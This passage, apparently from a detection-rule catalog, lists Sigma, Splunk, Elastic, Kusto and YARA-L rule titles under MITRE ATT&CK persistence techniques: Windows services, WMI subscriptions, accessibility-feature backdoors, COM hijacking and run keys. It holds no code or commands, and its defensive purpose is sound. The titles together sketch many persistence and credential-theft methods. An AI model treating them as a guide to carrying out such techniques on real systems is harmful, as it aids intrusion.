- Kusto TEARDROP memory-only dropper available
- Sigma Turla PNG Dropper Service test
- Sigma Turla Service Install test
- Sigma Uncommon Service Installation Image Path test
- Elastic Unsigned DLL Loaded by Svchost production
- Elastic Unusual Persistence via Services Registry production
- Sigma Vulnerable Driver Load test
- Sigma Vulnerable Driver Load By Name test
- Sigma Vulnerable HackSys Extreme Vulnerable Driver Load test
- Sigma Vulnerable WinRing0 Driver Load test
- Splunk Windows Bluetooth Service Installed From Uncommon Location production
- Splunk Windows KrbRelayUp Service Creation production
- Splunk Windows Local LLM Framework Execution production
- Splunk Windows Process Execution in Temp Dir production
- Splunk Windows Remote Create Service production
- Splunk Windows Service Create Kernel Mode Driver production
- Splunk Windows Service Create RemComSvc production
- Splunk Windows Service Create with Tscon production
- Splunk Windows Service Created (Sysmon)
- Splunk Windows Service Created (Windows Event Log)
- Splunk Windows Service Creation on Remote Endpoint production
- Splunk Windows Service Initiation on Remote Endpoint production
- Elastic Windows Service Installed via an Unusual Client production
- Splunk Windows Suspicious Driver Loaded Path production
- Splunk Windows Suspicious Process File Path production
- Splunk Windows Vulnerable Driver Installed production
- Splunk Windows Vulnerable Driver Loaded production
- Splunk Wscript Or Cscript Suspicious Child Process production
- Splunk XMRIG Driver Loaded production
Create or Modify System Process: Launch Agent T1543.001 1 rule
- Splunk Suspicious PlistBuddy Usage experimental
Create or Modify System Process: Systemd Service T1543.002 2 rules
- Sigma LiteLLM / TeamPCP Supply Chain Attack Indicators experimental
- Sigma TeamPCP LiteLLM Supply Chain Attack Persistence Indicators experimental
Create or Modify System Process: Windows Service T1543.003 108 rules
- Sigma Allow Service Access Using Security Descriptor Tampering Via Sc.EXE test
- Splunk CMD Echo Pipe - Escalation production
- Sigma CobaltStrike Service Installations - Security test
- Sigma CobaltStrike Service Installations - System test
- Sigma CosmicDuke Service Installation test
- Sigma Deny Service Access Using Security Descriptor Tampering Via Sc.EXE test
- Sigma Devcon Execution Disabling VMware VMCI Device experimental
- Sigma Driver Load From A Temporary Directory test
- Splunk Driver Loaded from Unusual Path - Windows (Sysmon)
- Sigma EAP service activation by Liontail framework for DLL sideloading (via command) stable
- Sigma Encoded PowerShell payload deployed via service experimental
- Splunk Impacket Lateral Movement Commandline Parameters production
- Splunk Impacket Lateral Movement smbexec CommandLine Parameters production
- Splunk Impacket Lateral Movement WMIExec Commandline Parameters production
- Sigma Impacket SMBexec service creation (registry) experimental
- Sigma Impacket SMBexec service registration (native) experimental
- Splunk Kernel Service Installed - Windows (Windows Event Log)
- Sigma Malicious Driver Load test
- Sigma Malicious Driver Load By Name test
- Sigma Mimikatz driver deployed via service experimental
- Sigma Mimikatz driver registration (Reg via Sysmon) experimental
- Sigma Moriya Rootkit - System test
- Sigma Moriya Rootkit File Created test
- Sigma New Kernel Driver Via SC.EXE test
- Sigma New PDQDeploy Service - Client Side test
- Sigma New PDQDeploy Service - Server Side test
- Sigma New Service Creation Using PowerShell test
- Sigma New Service Creation Using Sc.EXE test
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Elastic Persistence via Update Orchestrator Service Hijack production
- Elastic Persistence via WMI Standard Registry Provider production
- Sigma Possible impact of 'SMOKEDHAM backdoor' with MSDTC service privilege escalation via command line production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential CobaltStrike Service Installations - Registry test
- Sigma Potential Persistence Attempt Via Existing Service Tampering test
- Elastic Potential Privilege Escalation via Service ImagePath Modification production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma ProcessHacker Privilege Elevation test
- Sigma PSEXEC Remote Execution File Artefact test
- Splunk PSexec Service Creation (Windows Event Log)
- Sigma PSexec service installation experimental
- Sigma PUA - Kernel Driver Utility (KDU) Execution experimental
- Splunk Randomly Generated Windows Service Name experimental
- Kusto Rare Process as a Service available
- Sigma RDP session hijack via service creation abuse experimental
- Sigma Remote Access Tool Services Have Been Installed - Security test
- Sigma Remote Access Tool Services Have Been Installed - System test
- Elastic Remote Windows Service Installed production
- Sigma Service abuse with backdoored "command failure" (Reg via command) experimental
- Sigma Service abuse with backdoored "command failure" (Reg via PowerShell) experimental
- Sigma Service abuse with backdoored "command failure" (service) experimental
- Sigma Service abuse with malicious ImagePath (Reg via PowerShell) experimental
- Sigma Service abuse with malicious ImagePath (service) experimental
- Elastic Service Command Lateral Movement production
- Elastic Service Control Spawned via Script Interpreter production
- Sigma Service creation (command) experimental
- Sigma Service creation (PowerShell) experimental
- Elastic Service Creation via Local Kerberos Authentication production
- Elastic Service DACL Modification via sc.exe production
- Sigma Service Installation in Suspicious Folder test
- Sigma Service Installation with Suspicious Folder Pattern test
- Elastic Service Path Modification production
- Sigma Service permissions hijacked for privileges abuse (PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (reg via command) experimental
- Sigma Service permissions hijacked for privileges abuse (Reg via PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (service) experimental
- Sigma ServiceDll Hijack test
- Splunk Services LOLBAS Execution Process Spawn production
- Sigma Sliver C2 Default Service Installation test
- Sigma StoneDrill Service Install test
- Splunk Suspicious .sys Created - Windows (Sysmon)
- Elastic Suspicious ImagePath Service Creation production
- Sigma Suspicious New Service Creation test
- Elastic Suspicious ScreenConnect Client Child Process production
- Sigma Suspicious Service DACL Modification Via Set-Service Cmdlet test
- Sigma Suspicious Service Installation test
- Sigma Suspicious Service Installation Script test
- Sigma Suspicious Service Path Modification test
- Elastic Suspicious Service was Installed in the System production
- YARA-L Suspicious Windows Service Installation Detected
- Sigma Sysinternals PsService Execution test
- Sigma Sysinternals PsSuspend Execution test
- Elastic System Shells via Services production
- Sigma Turla PNG Dropper Service test
- Sigma Turla Service Install test
- Sigma Uncommon Service Installation Image Path test
- Elastic Unsigned DLL Loaded by Svchost production
- Elastic Unusual Persistence via Services Registry production
- Sigma Vulnerable Driver Load test
- Sigma Vulnerable Driver Load By Name test
- Sigma Vulnerable HackSys Extreme Vulnerable Driver Load test
- Sigma Vulnerable WinRing0 Driver Load test
- Splunk Windows Bluetooth Service Installed From Uncommon Location production
- Splunk Windows KrbRelayUp Service Creation production
- Splunk Windows Remote Create Service production
- Splunk Windows Service Create Kernel Mode Driver production
- Splunk Windows Service Create RemComSvc production
- Splunk Windows Service Create with Tscon production
- Splunk Windows Service Creation on Remote Endpoint production
- Splunk Windows Service Initiation on Remote Endpoint production
- Elastic Windows Service Installed via an Unusual Client production
- Splunk Windows Suspicious Driver Loaded Path production
- Splunk Windows Vulnerable Driver Installed production
- Splunk Windows Vulnerable Driver Loaded production
- Splunk XMRIG Driver Loaded production
Create or Modify System Process: Launch Daemon T1543.004 1 rule
- Sigma Atomic MacOS Stealer - Persistence Indicators experimental
Event Triggered Execution T1546 139 rules
- Splunk Access Common Package Config file (EDR)
- Splunk Access Common Package Config file (PowerShell)
- Splunk Access Common Package Config file (Sysmon)
- Splunk Access Common Package Config file (Windows Event Log)
- Sigma AdminSDHolder permissions changed for persistence experimental
- Kusto Caramel Tsunami Actor IOC - July 2021 available
- Sigma Change Default File Association To Executable Via Assoc test
- Sigma Change Default File Association Via Assoc test
- Sigma COM Hijack via Sdclt test
- Sigma COM Hijacking via TreatAs test
- Sigma COM Object Hijacking Via Modification Of Default System CLSID Default Value experimental
- Splunk Command Line Utility Added to Accessibility Features (PowerShell)
- Splunk Command Line Utility Added to Accessibility Features (Sysmon)
- Splunk Command Line Utility Added to Accessibility Features (Windows Event Log)
- Elastic Component Object Model Hijacking production
- Kusto Component Object Model Hijacking - Vault7 trick available
- Sigma Control Panel Items test
- Splunk Detect WMI Event Subscription Persistence production
- Sigma HAFNIUM Exchange Exploitation Activity test
- Elastic Image File Execution Options Injection production
- Elastic Installation of Custom Shim Databases production
- Kusto Modification of Accessibility Features
- Elastic Mofcomp Activity production
- Sigma MSSQL Extended Stored Procedure Backdoor Maggie test
- Elastic Netsh Helper DLL production
- Sigma Netsh helper DLL abuse (process) experimental
- Sigma Netsh helper DLL abuse (Reg via Sysmon) experimental
- Sigma New ActiveScriptEventConsumer Created Via Wmic.EXE test
- Sigma New DLL Added to AppCertDlls Registry Key test
- Sigma New DLL Added to AppInit_DLLs Registry Key test
- Sigma New Netsh Helper DLL Registered From A Suspicious Location test
- Sigma New Outlook Macro Created test
- Sigma Outlook Macro Execution Without Warning Setting Enabled test
- Splunk Overwriting Accessibility Binaries production
- Sigma Path To Screensaver Binary Modified test
- Sigma Persistence Via Sticky Key Backdoor test
- Elastic Persistence via WMI Event Subscription production
- Elastic Potential Application Shimming via Sdbinst production
- Sigma Potential COM Object Hijacking Via TreatAs Subkey - Registry test
- Elastic Potential Modification of Accessibility Binaries production
- Sigma Potential Persistence Using DebugPath test
- Sigma Potential Persistence Via App Paths Default Property test
- Sigma Potential Persistence Via AppCompat RegisterAppRestart Layer test
- Sigma Potential Persistence Via GlobalFlags test
- Sigma Potential Persistence Via Netsh Helper DLL test
- Sigma Potential Persistence Via Netsh Helper DLL - Registry test
- Sigma Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting test
- Sigma Potential Persistence Via PowerShell User Profile Using Add-Content test
- Sigma Potential Persistence Via Scrobj.dll COM Hijacking test
- Sigma Potential Persistence Via Shim Database In Uncommon Location test
- Sigma Potential Persistence Via Shim Database Modification test
- Sigma Potential Privilege Escalation Using Symlink Between Osk and Cmd test
- Sigma Potential PSFactoryBuffer COM Hijacking test
- Sigma Potential Remote WMI ActiveScriptEventConsumers Activity test
- Elastic Potential RemoteMonologue Attack production
- Sigma Potential Shim Database Persistence via Sdbinst.EXE test
- Sigma Potential Suspicious Activity Using SeCEdit test
- Splunk Powershell COM Hijacking InprocServer32 Modification production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Powershell Execute COM Object production
- Sigma PowerShell Profile Modification test
- Sigma Powershell WMI Persistence test
- Splunk Registry Keys for Creating SHIM Databases production
- Splunk Registry Keys Used For Privilege Escalation production
- Sigma Registry Modification of MS-settings Protocol Handler test
- Elastic Registry Persistence via AppCert DLL production
- Kusto Registry Persistence via AppCert DLL Modification available
- Elastic Registry Persistence via AppInit DLL production
- Kusto Registry Persistence via AppInit DLLs Modification available
- Sigma Rundll32 Registered COM Objects test
- Splunk Rundll32 Spawned by Disk Cleanup (Sysmon)
- Splunk Rundll32 Spawned by Disk Cleanup (Windows Event Log)
- Splunk Screensaver Event Trigger Execution production
- Sigma Session Manager Autorun Keys Modification test
- Sigma Shell Open Registry Keys Manipulation test
- Splunk Shim Database File Creation production
- Splunk Shim Database Installation With Suspicious Parameters production
- Sigma SOURGUM Actor Behaviours test
- Sigma Stickey key called CMD via command execution experimental
- Sigma Stickey key called CMD via command execution (hash detection) experimental
- Sigma Stickey key IFEO (Reg via command) experimental
- Sigma Stickey key IFEO registry changed (Reg via Sysmon) experimental
- Sigma Sticky key file created from CMD copy experimental
- Sigma Sticky Key Like Backdoor Execution test
- Sigma Sticky Key Like Backdoor Usage - Registry test
- Sigma Sticky key sethc command for replacement by CMD experimental
- Sigma Sticky key sethc file failed replacement experimental
- Kusto SUNBURST and SUPERNOVA backdoor hashes available
- Kusto SUNBURST and SUPERNOVA backdoor hashes (Normalized File Events)
- Kusto SUNBURST network beacons available
- Sigma Suspicious Debugger Registration Cmdline test
- Splunk Suspicious DLLhost Execution (EDR)
- Splunk Suspicious DLLhost Execution (PowerShell)
- Splunk Suspicious DLLhost Execution (Windows Event Log)
- Sigma Suspicious Encoded Scripts in a WMI Consumer test
- Splunk Suspicious Execution of Accessibility Tool Debuggers (Sysmon)
- Splunk Suspicious Execution of Accessibility Tool Debuggers (Windows Event Log)
- Sigma Suspicious Get-Variable.exe Creation test
- Sigma Suspicious GetTypeFromCLSID ShellExecute test
- Splunk Suspicious InprocServer32 Registry Modification (Sysmon)
- Splunk Suspicious InprocServer32 Registry Modification (Windows Event Log)
- Sigma Suspicious Outlook Macro Created test
- Splunk Suspicious Registry Key Created (PowerShell)
- Splunk Suspicious Registry Key Created (Windows Event Log)
- Sigma Suspicious ScreenSave Change by Reg.exe test
- Sigma Suspicious Screensaver Binary File Creation test
- Sigma Suspicious Shell Open Command Registry Modification experimental
- Sigma Suspicious Shim Database Patching Activity test
- Elastic Suspicious WerFault Child Process production
- Elastic Suspicious WMI Event Subscription Created production
- Sigma System crash behavior manipulation - WMImplant (registry) experimental
- Sigma Uncommon Extension Shim Database Installation Via Sdbinst.EXE test
- Elastic Uncommon Registry Persistence Change production
- Sigma VsCode Powershell Profile Modification test
- Elastic Werfault ReflectDebugger Persistence production
- Splunk Windows AD AdminSDHolder ACL Modified production
- Splunk Windows AppCertDLL Modification Via Command Line production
- Splunk Windows Change File Association Command To Notepad production
- Splunk Windows COM Hijacking InprocServer32 Modification production
- Splunk Windows Compatibility Telemetry Suspicious Child Process production
- Splunk Windows Compatibility Telemetry Tampering Through Registry production
- Splunk Windows Event Triggered Image File Execution Options Injection production
- Splunk Windows MOF Event Triggered Execution via WMI production
- Splunk Windows New Default File Association Value Set production
- Sigma WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load test
- Sigma WMI Backdoor Exchange Transport Agent test
- Sigma WMI Event Subscription test
- Splunk WMI Permanent Event Subscription - Sysmon production
- Sigma WMI Persistence test
- Sigma WMI Persistence - Command Line Event Consumer test
- Sigma WMI Persistence - Script Event Consumer test
- Sigma WMI Persistence - Script Event Consumer File Write test
- Sigma WMI Persistence - Security test
- Sigma WMI registration experimental
- Sigma WMI registration (PowerShell) experimental
- Splunk WMI subscription execution (Sysmon)
- Splunk WMI subscription execution (Windows Event Log)
- Sigma Writing Local Admin Share test
- Kusto Zinc Actor IOCs files - October 2022 available
Event Triggered Execution: Change Default File Association T1546.001 7 rules
- Sigma Change Default File Association To Executable Via Assoc test
- Sigma Change Default File Association Via Assoc test
- Sigma Registry Modification of MS-settings Protocol Handler test
- Sigma Shell Open Registry Keys Manipulation test
- Sigma Suspicious Shell Open Command Registry Modification experimental
- Splunk Windows Change File Association Command To Notepad production
- Splunk Windows New Default File Association Value Set production
Event Triggered Execution: Screensaver T1546.002 6 rules
- Sigma Path To Screensaver Binary Modified test
- Splunk Screensaver Event Trigger Execution production
- Sigma Suspicious ScreenSave Change by Reg.exe test
- Sigma Suspicious Screensaver Binary File Creation test
- Elastic Uncommon Registry Persistence Change production
- Sigma Writing Local Admin Share test
Event Triggered Execution: Windows Management Instrumentation Event Subscription T1546.003 23 rules
- Splunk Detect WMI Event Subscription Persistence production
- Elastic Mofcomp Activity production
- Sigma New ActiveScriptEventConsumer Created Via Wmic.EXE test
- Elastic Persistence via WMI Event Subscription production
- Sigma Potential Remote WMI ActiveScriptEventConsumers Activity test
- Sigma Powershell WMI Persistence test
- Sigma Suspicious Encoded Scripts in a WMI Consumer test
- Elastic Suspicious WMI Event Subscription Created production
- Sigma System crash behavior manipulation - WMImplant (registry) experimental
- Splunk Windows MOF Event Triggered Execution via WMI production
- Sigma WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load test
- Sigma WMI Backdoor Exchange Transport Agent test
- Sigma WMI Event Subscription test
- Splunk WMI Permanent Event Subscription - Sysmon production
- Sigma WMI Persistence test
- Sigma WMI Persistence - Command Line Event Consumer test
- Sigma WMI Persistence - Script Event Consumer test
- Sigma WMI Persistence - Script Event Consumer File Write test
- Sigma WMI Persistence - Security test
- Sigma WMI registration experimental
- Sigma WMI registration (PowerShell) experimental
- Splunk WMI subscription execution (Sysmon)
- Splunk WMI subscription execution (Windows Event Log)
Event Triggered Execution: Netsh Helper DLL T1546.007 7 rules
- Elastic Netsh Helper DLL production
- Sigma Netsh helper DLL abuse (process) experimental
- Sigma Netsh helper DLL abuse (Reg via Sysmon) experimental
- Sigma New Netsh Helper DLL Registered From A Suspicious Location test
- Sigma Potential Persistence Via Netsh Helper DLL test
- Sigma Potential Persistence Via Netsh Helper DLL - Registry test
- Sigma Potential Suspicious Activity Using SeCEdit test
Event Triggered Execution: Accessibility Features T1546.008 22 rules
- Splunk Command Line Utility Added to Accessibility Features (PowerShell)
- Splunk Command Line Utility Added to Accessibility Features (Sysmon)
- Splunk Command Line Utility Added to Accessibility Features (Windows Event Log)
- Kusto Modification of Accessibility Features
- Splunk Overwriting Accessibility Binaries production
- Sigma Persistence Via Sticky Key Backdoor test
- Elastic Potential Modification of Accessibility Binaries production
- Sigma Potential Privilege Escalation Using Symlink Between Osk and Cmd test
- Sigma Potential Suspicious Activity Using SeCEdit test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Stickey key called CMD via command execution experimental
- Sigma Stickey key called CMD via command execution (hash detection) experimental
- Sigma Stickey key IFEO (Reg via command) experimental
- Sigma Stickey key IFEO registry changed (Reg via Sysmon) experimental
- Sigma Sticky key file created from CMD copy experimental
- Sigma Sticky Key Like Backdoor Execution test
- Sigma Sticky Key Like Backdoor Usage - Registry test
- Sigma Sticky key sethc command for replacement by CMD experimental
- Sigma Sticky key sethc file failed replacement experimental
- Sigma Suspicious Debugger Registration Cmdline test
- Splunk Suspicious Execution of Accessibility Tool Debuggers (Sysmon)
- Splunk Suspicious Execution of Accessibility Tool Debuggers (Windows Event Log)
Event Triggered Execution: AppCert DLLs T1546.009 5 rules
- Sigma New DLL Added to AppCertDlls Registry Key test
- Elastic Registry Persistence via AppCert DLL production
- Kusto Registry Persistence via AppCert DLL Modification available
- Sigma Session Manager Autorun Keys Modification test
- Splunk Windows AppCertDLL Modification Via Command Line production
Event Triggered Execution: AppInit DLLs T1546.010 3 rules
- Sigma New DLL Added to AppInit_DLLs Registry Key test
- Elastic Registry Persistence via AppInit DLL production
- Kusto Registry Persistence via AppInit DLLs Modification available
Event Triggered Execution: Application Shimming T1546.011 11 rules
- Elastic Installation of Custom Shim Databases production
- Elastic Potential Application Shimming via Sdbinst production
- Sigma Potential Persistence Via AppCompat RegisterAppRestart Layer test
- Sigma Potential Persistence Via Shim Database In Uncommon Location test
- Sigma Potential Persistence Via Shim Database Modification test
- Sigma Potential Shim Database Persistence via Sdbinst.EXE test
- Splunk Registry Keys for Creating SHIM Databases production
- Splunk Shim Database File Creation production
- Splunk Shim Database Installation With Suspicious Parameters production
- Sigma Suspicious Shim Database Patching Activity test
- Sigma Uncommon Extension Shim Database Installation Via Sdbinst.EXE test
Event Triggered Execution: Image File Execution Options Injection T1546.012 10 rules
- Elastic Image File Execution Options Injection production
- Sigma Potential Persistence Via App Paths Default Property test
- Sigma Potential Persistence Via GlobalFlags test
- Splunk Registry Keys Used For Privilege Escalation production
- Splunk Suspicious Registry Key Created (PowerShell)
- Splunk Suspicious Registry Key Created (Windows Event Log)
- Elastic Suspicious WerFault Child Process production
- Elastic Uncommon Registry Persistence Change production
- Elastic Werfault ReflectDebugger Persistence production
- Splunk Windows Event Triggered Image File Execution Options Injection production
Event Triggered Execution: Component Object Model Hijacking T1546.015 22 rules
- Sigma COM Hijacking via TreatAs test
- Sigma COM Object Hijacking Via Modification Of Default System CLSID Default Value experimental
- Elastic Component Object Model Hijacking production
- Kusto Component Object Model Hijacking - Vault7 trick available
- Sigma Potential COM Object Hijacking Via TreatAs Subkey - Registry test
- Sigma Potential Persistence Using DebugPath test
- Sigma Potential Persistence Via Scrobj.dll COM Hijacking test
- Sigma Potential PSFactoryBuffer COM Hijacking test
- Elastic Potential RemoteMonologue Attack production
- Splunk Powershell COM Hijacking InprocServer32 Modification production
- Splunk Powershell Execute COM Object production
- Sigma Rundll32 Registered COM Objects test
- Splunk Rundll32 Spawned by Disk Cleanup (Sysmon)
- Splunk Rundll32 Spawned by Disk Cleanup (Windows Event Log)
- Sigma SOURGUM Actor Behaviours test
- Splunk Suspicious DLLhost Execution (EDR)
- Splunk Suspicious DLLhost Execution (PowerShell)
- Splunk Suspicious DLLhost Execution (Windows Event Log)
- Sigma Suspicious GetTypeFromCLSID ShellExecute test
- Splunk Suspicious InprocServer32 Registry Modification (Sysmon)
- Splunk Suspicious InprocServer32 Registry Modification (Windows Event Log)
- Splunk Windows COM Hijacking InprocServer32 Modification production
Boot or Logon Autostart Execution T1547 154 rules
- Splunk Active Setup Registry Autostart production
- Splunk Add DLL_EXE Registry Value (Sysmon)
- Sigma Add Port Monitor Persistence in Registry test
- Splunk Additional dll added to Spool Driver (Sysmon)
- Splunk Additional dll added to Spool Driver (Windows Event Log)
- Sigma Atbroker Registry Change test
- Sigma Bypass UAC Using Event Viewer test
- Sigma Classes Autorun Keys Modification test
- Sigma Common Autorun Keys Modification test
- Sigma Creation Exe for Service with Unquoted Path test
- Sigma CurrentControlSet Autorun Keys Modification test
- YARA-L CurrentControlSet Autorun Keys Modification
- Sigma CurrentVersion Autorun Keys Modification test
- YARA-L CurrentVersion Autorun Keys Modification
- Sigma CurrentVersion NT Autorun Keys Modification test
- Sigma Default RDP Port Changed to Non Standard Port test
- YARA-L Default RDP Port Changed to Non Standard Port
- Sigma Desktop.INI Created by Uncommon Process test
- Kusto Detect Print Processors Registry Driver Key Creation/Modification available
- Kusto Detect Registry Run Key Creation/Modification available
- Sigma Direct Autorun Keys Modification test
- YARA-L Direct Autorun Keys Modification
- Sigma DLL Load via LSASS test
- Splunk Execution from Startup Folder (Sysmon)
- Splunk Execution from Startup Folder (Windows Event Log)
- Elastic Execution of Persistent Suspicious Program production
- Sigma File Creation In Suspicious Directory By Msdt.EXE test
- Splunk File Written to Startup Folder - Windows (Sysmon)
- Splunk File Written to Startup Folder - Windows (Windows Event Log)
- Sigma Forest Blizzard APT - Custom Protocol Handler Creation test
- Sigma Forest Blizzard APT - Custom Protocol Handler DLL Registry Set test
- Kusto Imminent Ransomware available
- Elastic Installation of Security Support Provider production
- Sigma Internet Explorer Autorun Keys Modification test
- Sigma Kapeka Backdoor Autorun Persistence test
- Elastic Lateral Movement via Startup Folder production
- Sigma Leviathan Registry Key Activity test
- Splunk LSA Authentication Packages Registry Key Modified (PowerShell)
- Splunk LSA Authentication Packages Registry Key Modified (Sysmon)
- Splunk LSA Authentication Packages Registry Key Modified (Windows Event Log)
- Kusto Midnight Blizzard - suspicious rundll32.exe execution of vbscript
- Kusto Midnight Blizzard - suspicious rundll32.exe execution of vbscript (Normalized Process Events)
- Sigma Modify User Shell Folders Startup Value test
- YARA-L Modify User Shell Folders Startup Value
- Splunk Monitor Registry Keys for Print Monitors production
- Sigma Narrator's Feedback-Hub Persistence test
- Splunk New AutoRun Registry Key (PowerShell)
- Sigma New Custom Shim Database Created test
- Sigma New RUN Key Pointing to Suspicious Folder experimental
- YARA-L New RUN Key Pointing to Suspicious Folder
- Sigma New TimeProviders Registered With Uncommon DLL Name test
- Sigma NTFS hard link creation experimental
- Sigma NTFS symbolic link configuration change experimental
- Sigma NTFS symbolic link creation experimental
- Sigma Office Autorun Keys Modification test
- Elastic Persistence via a Windows Installer production
- Elastic Persistence via Hidden Run Key Detected production
- Elastic Persistence via WMI Standard Registry Provider production
- Sigma Potential KamiKakaBot Activity - Winlogon Shell Persistence test
- Elastic Potential LSA Authentication Package Abuse production
- Splunk Potential LSA password filter (PowerShell)
- Splunk Potential LSA password filter (Windows Event Log)
- Sigma Potential Persistence Attempt Via Run Keys Using Reg.EXE test
- Elastic Potential Persistence via Mandatory User Profile production
- Elastic Potential Persistence via Time Provider Modification production
- Elastic Potential Port Monitor or Print Processor Registration Abuse production
- Splunk Potential Proxy Malware via AutoRun Key (PowerShell)
- Splunk Potential Proxy Malware via AutoRun Key (Sysmon)
- Splunk Potential Proxy Malware via AutoRun Key (Windows Event Log)
- Elastic Potential REMCOS Trojan Execution production
- Sigma Potential RipZip Attack on Startup Folder test
- Sigma Potential Ryuk Ransomware Activity stable
- Sigma Potential Startup Shortcut Persistence Via PowerShell.EXE test
- Sigma Potential Suspicious Activity Using SeCEdit test
- YARA-L Potential Suspicious Activity Using SeCEdit
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Print Processor Registry Autostart production
- Splunk Print Spooler Adding A Printer Driver production
- Splunk Print Spooler Failed to Load a Plug-in production
- Sigma Print spooler privilege escalation via printer added (CVE-2020-1048) experimental
- Splunk Rare dll called by Spoolsv.exe (Windows Event Log)
- Splunk Registry Keys Used For Persistence production
- Sigma Registry Persistence Mechanisms in Recycle Bin test
- Sigma Registry Persistence via Explorer Run Key test
- Kusto Registry Run Keys - Suspicious Registry Run Keys
- Sigma Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace test
- Sigma Security package (SSP) added (Reg via command) experimental
- Sigma Security package (SSP) loaded into LSA (native) experimental
- Sigma Security Support Provider (SSP) Added to LSA Configuration test
- Sigma Session Manager Autorun Keys Modification test
- YARA-L Session Manager Autorun Keys Modification
- Splunk Shortcut Created in Startup Folder - Windows (PowerShell)
- Splunk Spoolsv Spawning Rundll32 production
- Splunk Spoolsv Suspicious Loaded Modules production
- Splunk Spoolsv Writing a DLL production
- Splunk Spoolsv Writing a DLL - Sysmon production
- Sigma Startup Folder File Write test
- Splunk Startup Folder Location Modified - Windows (PowerShell)
- Splunk Startup Folder Location Modified - Windows (Sysmon)
- Splunk Startup Folder Location Modified - Windows (Windows Event Log)
- Elastic Startup Folder Persistence via Unsigned Process production
- Elastic Startup or Run Key Registry Modification production
- Sigma Startup/Logon Script Added to Group Policy Object test
- Elastic Startup/Logon Script added to Group Policy Object production
- Sigma Suspicious Autorun Registry Modified via WMI experimental
- Sigma Suspicious Driver Install by pnputil.exe test
- Sigma Suspicious GrpConv Execution test
- Elastic Suspicious Module Loaded by LSASS production
- Sigma Suspicious PowerShell In Registry Run Keys test
- YARA-L Suspicious Powershell In Registry Run Keys
- Splunk Suspicious Registry Key Created (PowerShell)
- Splunk Suspicious Registry Key Created (Windows Event Log)
- Sigma Suspicious Run Key from Download test
- Sigma Suspicious Startup Folder Persistence test
- Elastic Suspicious Startup Shell Folder Modification production
- Sigma Suspicious VBScript UN2452 Pattern test
- Splunk Symbolic OR Hard File Link Created (PowerShell)
- Splunk Symbolic OR Hard File Link Created (Windows Event Log)
- Sigma System Scripts Autorun Keys Modification test
- Sigma SystemNightmare by GentilKiwi - External printer mapped (CVE-2021-1675 / CVE-2021-34527) experimental
- Sigma SystemNightmare by GentilKiwi - New external device added (CVE-2021-1675 / CVE-2021-34527) experimental
- Splunk Time Provider Persistence Registry production
- Elastic Uncommon Registry Persistence Change production
- Splunk Unusual winlogon.exe Child Process (Sysmon)
- Splunk Unusual winlogon.exe Child Process (Windows Event Log)
- Sigma User Shell Folders Registry Modification via CommandLine experimental
- Sigma VBScript Payload Stored in Registry test
- Splunk Windows Audit Policy Auditing Option Modified - Registry production
- Splunk Windows Autostart Execution LSASS Driver Registry Modification production
- Splunk Windows Boot or Logon Autostart Execution In Startup Folder production
- Sigma Windows Event Log Access Tampering Via Registry experimental
- Sigma Windows Network Access Suspicious desktop.ini Action test
- Splunk Windows NorthStar C2 Agent Execution production
- Splunk Windows PowerShell MSIX Package Installation production
- Splunk Windows Registry BootExecute Modification production
- Splunk Windows Registry Modification for Safe Mode Persistence production
- Splunk Windows Security Support Provider Reg Query production
- Splunk Windows Snake Malware Kernel Driver Comadmin production
- Splunk Windows Snake Malware Service Create production
- Sigma Windows Terminal Profile Settings Modification By Uncommon Process test
- Splunk Windows Unsigned MS DLL Side-Loading production
- Sigma WINEKEY Registry Modification test
- Sigma Winlogon Helper DLL test
- Sigma Winlogon Notify Key Logon Persistence test
- Splunk WinLogon Registry Key Modified (PowerShell)
- Splunk WinLogon Registry Key Modified (Sysmon)
- Sigma WinRAR Creating Files in Startup Locations experimental
- Sigma WinSock2 Autorun Keys Modification test
- Sigma Wow6432Node Classes Autorun Keys Modification test
- Splunk Wow6432Node Classes Autorun Keys Modification (PowerShell)
- Splunk Wow6432Node Classes Autorun Keys Modification (Sysmon)
- Splunk Wow6432Node Classes Autorun Keys Modification (Windows Event Log)
- Sigma Wow6432Node CurrentVersion Autorun Keys Modification test
- Sigma Wow6432Node Windows NT CurrentVersion Autorun Keys Modification test
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder T1547.001 84 rules
- Splunk Add DLL_EXE Registry Value (Sysmon)
- Sigma Classes Autorun Keys Modification test
- Sigma Common Autorun Keys Modification test
- Sigma CurrentControlSet Autorun Keys Modification test
- YARA-L CurrentControlSet Autorun Keys Modification
- Sigma CurrentVersion Autorun Keys Modification test
- YARA-L CurrentVersion Autorun Keys Modification
- Sigma CurrentVersion NT Autorun Keys Modification test
- Sigma Direct Autorun Keys Modification test
- YARA-L Direct Autorun Keys Modification
- Splunk Execution from Startup Folder (Sysmon)
- Splunk Execution from Startup Folder (Windows Event Log)
- Elastic Execution of Persistent Suspicious Program production
- Sigma File Creation In Suspicious Directory By Msdt.EXE test
- Splunk File Written to Startup Folder - Windows (Sysmon)
- Splunk File Written to Startup Folder - Windows (Windows Event Log)
- Sigma Forest Blizzard APT - Custom Protocol Handler Creation test
- Sigma Forest Blizzard APT - Custom Protocol Handler DLL Registry Set test
- Sigma Internet Explorer Autorun Keys Modification test
- Sigma Kapeka Backdoor Autorun Persistence test
- Elastic Lateral Movement via Startup Folder production
- Sigma Leviathan Registry Key Activity test
- Sigma Modify User Shell Folders Startup Value test
- YARA-L Modify User Shell Folders Startup Value
- Sigma Narrator's Feedback-Hub Persistence test
- Splunk New AutoRun Registry Key (PowerShell)
- Sigma New RUN Key Pointing to Suspicious Folder experimental
- YARA-L New RUN Key Pointing to Suspicious Folder
- Sigma Office Autorun Keys Modification test
- Elastic Persistence via a Windows Installer production
- Elastic Persistence via Hidden Run Key Detected production
- Elastic Persistence via WMI Standard Registry Provider production
- Sigma Potential KamiKakaBot Activity - Winlogon Shell Persistence test
